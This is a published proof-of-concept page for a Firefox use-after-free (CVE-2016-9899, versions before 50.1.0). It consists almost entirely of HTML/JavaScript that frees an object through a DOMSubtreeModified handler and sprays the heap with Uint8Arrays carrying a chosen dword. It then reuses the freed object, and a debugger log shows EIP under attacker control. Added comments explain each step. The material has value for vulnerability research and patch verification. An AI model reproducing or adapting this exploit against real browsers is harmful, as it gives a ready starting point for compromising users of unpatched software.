
Mozilla Firefox Use-After-Free

🗓️ 13 Jan 2017 00:00:00Reported by Marcin ResselType 

Mozilla Firefox Use-After-Free vulnerability POC

`<!DOCTYPE html>  
<html>  
<head>  
<!-- <meta http-equiv="refresh" content="1"/> -->  
<meta http-equiv="content-type" content="text/html; charset=UTF-8">  
<meta http-equiv="Expires" content="0" />  
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />  
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />  
<meta http-equiv="Pragma" content="no-cache" />  
<style type="text/css">  
body{  
background-color:lime;  
font-color:red;  
};  
</style>  
<script type='text/javascript'></script>   
<script type="text/javascript" language="JavaScript">  
  
/*   
* Mozilla Firefox < 50.1.0 Use-After-Free POC  
* Author: Marcin Ressel  
* Date: 13.01.2017  
* Vendor Homepage: www.mozilla.org  
* Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/  
* Version: < 50.1.0  
* Tested on: Windows 7 (x64) Firefox 32 && 64 bit  
* CVE: CVE-2016-9899  
*************************************************  
* (b1c.5e0): Access violation - code c0000005 (first chance)  
* First chance exceptions are reported before any exception handling.  
* This exception may be expected and handled.  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll -   
* eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580  
* eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0 nv up ei pl nz na pe nc  
* cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206  
* xul!mozilla::net::LoadInfo::AddRef+0x3dd41:  
* 6d7cc44c ff12 call dword ptr [edx] ds:002b:4543484f=????????  
* 0:000> dd eax  
* 0f804c00 4543484f 91919191 91919191 91919191  
* 0f804c10 91919191 91919191 91919191 91919191  
* 0f804c20 91919191 91919191 91919191 91919191  
* 0f804c30 91919191 91919191 91919191 91919191  
* 0f804c40 91919191 91919191 91919191 91919191  
* 0f804c50 91919191 91919191 91919191 91919191  
* 0f804c60 91919191 91919191 91919191 91919191  
* 0f804c70 91919191 91919191 91919191 91919191  
*  
*/   
var doc = null;  
var cnt = 0;  
  
/**
 * Build `blocks` arrays, each created with length `size` and filled with the
 * alternating dword pattern 0x41414141 / 0x42424242. The fill loop advances by
 * two, so an odd `size` ends up one element longer than requested.
 * Called from handler() and testcase(); presumably an allocation helper — the
 * values themselves are never read back.
 *
 * @param {number} blocks - number of inner arrays to create
 * @param {number} size   - nominal length of each inner array
 * @returns {number[][]} the filled arrays
 */
function m(blocks,size) {
  const rows = [];
  let b = 0;
  while (b < blocks) {
    const row = new Array(size);
    let j = 0;
    while (j < size) {
      row[j] = 0x41414141;
      row[j + 1] = 0x42424242;
      j += 2;
    }
    rows.push(row);
    b += 1;
  }
  return rows;
}
  
/*
 * DOMSubtreeModified listener that testcase() registers on the first element of the
 * iframe document. Its body runs once, guarded by the global `cnt`:
 *   - appends an <audio> element to the iframe body and removes it straight away
 *     (the author's "free" marker: this is the step that is meant to release the
 *     object later reused; which object is freed is not visible in this file);
 *   - allocates 1024 arrays of 1024 ints via m() — presumably to disturb the heap
 *     after the release; the result is discarded.
 * NOTE(review): appendChild()/remove() inside a DOMSubtreeModified listener may
 * re-dispatch the event while `cnt` is still 0, so the guard does not prevent
 * re-entry here — confirm whether that is intended.
 */
function handler() { //free  
if(cnt > 0) return;  
doc.body.appendChild(document.createElement("audio")).remove();   
m(1024,1024);   
++cnt;  
}  
  
/*
 * Polled every second by the setInterval in testcase(). Does nothing until
 * handler() has run (cnt > 0); then:
 *   - detaches handler() from the iframe element so no further mutation events
 *     re-enter it;
 *   - creates 4096 Uint8Array(1000) buffers (the author's "replace" step). Bytes
 *     0..3 are 0x4F 0x48 0x43 0x45, i.e. the dword 0x4543484F little-endian, which
 *     is the value of edx / the first dword at eax in the crash log in the header
 *     comment; bytes 4..995 are 0x91; the loop bound (1000 - 4) leaves bytes
 *     996..999 at their zero default;
 *   - parks the buffers on window.pl, presumably so they stay reachable and are
 *     not collected;
 *   - removes the iframe #t1 (the author's "re-use" step), after which the crash
 *     shown in the header comment is expected.
 * NOTE(review): the interval is never cleared, so on the next tick after the iframe
 * is gone document.getElementById("t1") returns null and .remove() throws a
 * TypeError; harmless once the crash has already occurred.
 */
function trigger() {  
if(cnt > 0) {  
var pl = new Array();  
doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false);   
for(var i=0;i<4096;i++) { //replace  
pl[i]=new Uint8Array(1000);  
pl[i][0] = 0x4F;  
pl[i][1] = 0x48;  
pl[i][2] = 0x43;  
pl[i][3] = 0x45; //eip   
for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91;   
// pl[i] = document.createElement('media');  
//document.body.appendChild(pl[i]);  
}  
window.pl = pl  
document.getElementById("t1").remove(); //re-use  
}  
}  
  
/*
 * Entry point, invoked from <body onload>. Sets the PoC up:
 *   1. m(4096,1000) is stored as the "df" attribute of <body>. setAttribute()
 *      coerces the nested array to a string, so what is actually retained on the
 *      DOM is one large comma-joined string, not the arrays — presumably intended
 *      as an allocation step; verify against the author's intent.
 *   2. `doc` is pointed at the about:blank iframe's document and handler() is
 *      registered for DOMSubtreeModified on its first element.
 *   3. Assigning a string to that element's .style is presumably what dispatches
 *      the mutation event that runs handler(); the dispatch itself is not visible
 *      in this file.
 *   4. trigger() is polled every second. setInterval is given a string here, which
 *      is the implicit-eval form; passing the function reference (setInterval(trigger,
 *      1000)) would be the conventional spelling.
 */
function testcase()  
{  
var df = m(4096,1000);  
document.body.setAttribute('df',df);  
doc = document.getElementById("t1").contentWindow.document;  
doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false);   
doc.getElementsByTagName("*")[0].style = "ANNNY";  
setInterval("trigger();",1000);   
  
}  
</script>  
<title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title>  
</head>  
<body onload='testcase();'>  
<iframe src='about:blank' id='t1' width="100%"></iframe>  
</body>  
</html>  
  
`
